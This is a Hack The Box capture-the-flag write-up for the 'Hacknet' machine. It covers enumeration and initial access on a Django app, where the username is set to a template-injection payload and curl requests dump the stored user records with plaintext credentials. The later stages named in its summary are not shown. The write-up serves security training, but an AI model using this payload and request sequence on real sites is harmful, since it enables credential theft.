Hack The Box - HTB Hacknet Writeup - Medium - Weekly - September 13th, 2025
HackTheBox - Hacknet Writeup
Machine: Hacknet
Difficulty: Medium
OS: Linux
IP: [MACHINE_IP]
Summary
Hacknet is a medium-difficulty Linux machine that showcases a Django web application with multiple vulnerabilities. The attack path involves exploiting a Server-Side Template Injection (SSTI) vulnerability combined with an Insecure Direct Object Reference (IDOR) to extract user credentials, followed by lateral movement via Django cache poisoning using Python Pickle deserialization, and finally privilege escalation through GPG-encrypted database backup analysis.
Initial Enumeration
Port Scanning
Starting with a standard nmap scan to identify open services:
nmap -sC -sV -oA nmap/hacknet [MACHINE_IP]
Web Enumeration
The target runs a web service on port 80. Let's add the domain to our hosts file:
echo "[MACHINE_IP] hacknet.htb" >> /etc/hosts
Directory and Subdomain Discovery
# Directory enumeration
feroxbuster -u http://hacknet.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e
# Subdomain enumeration
ffuf -u http://hacknet.htb -H "Host: FUZZ.hacknet.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
Unfortunately, both feroxbuster and ffuf didn't reveal anything interesting.
Web Application Analysis
Visiting http://hacknet.htb/ reveals a login page. Using Wappalyzer, we can identify that the application is built with the Django Framework.
The application appears to be a Django-style social media platform with the following key endpoints:
/profile- User profile management/profile/edit- Username editing (critical for our exploit)/messages- User messaging/contacts- Contact management/explore- Content discovery/search- Search functionalityGET /like/<POST_ID>- Toggle like state (AJAX)GET /likes/<POST_ID>- HTML fragment showing post likers
Initial Access - SSTI Exploitation
Vulnerability Discovery
After registering a new user account, I discovered that the application renders usernames directly within Django templates when displaying the list of post likers at /likes/<id>.
The critical vulnerability lies in how the application handles the username field in the likes functionality. When a user likes a post, their username is rendered in an HTML fragment like this:
<div class="likes-review-item">
<a href="/profile/<UID>">
<img src="/media/<pic>" title="<SERVER-RENDERED-CONTENT>">
</a>
</div>
The value inside the title attribute is rendered using Django's template engine, creating a Server-Side Template Injection (SSTI) vulnerability.
Exploitation Process
Step 1: Change username to SSTI payload
Navigate to /profile/edit and set the username to:
{{users.values}}
Step 2: Like a target post
Send a GET request to like a specific post:
curl -s -b "sessionid=YOUR_SESSION_ID; csrftoken=YOUR_CSRF_TOKEN" \
-H "Host: hacknet.htb" \
-H "X-Requested-With: XMLHttpRequest" \
"http://hacknet.htb/like/23"
Step 3: Extract credentials
Visit /likes/23 to trigger the template injection:
curl -s -b "sessionid=YOUR_SESSION_ID; csrftoken=YOUR_CSRF_TOKEN" \
-H "Host: hacknet.htb" \
"http://hacknet.htb/likes/23"
This returns the full Django QuerySet dump containing user credentials in plaintext!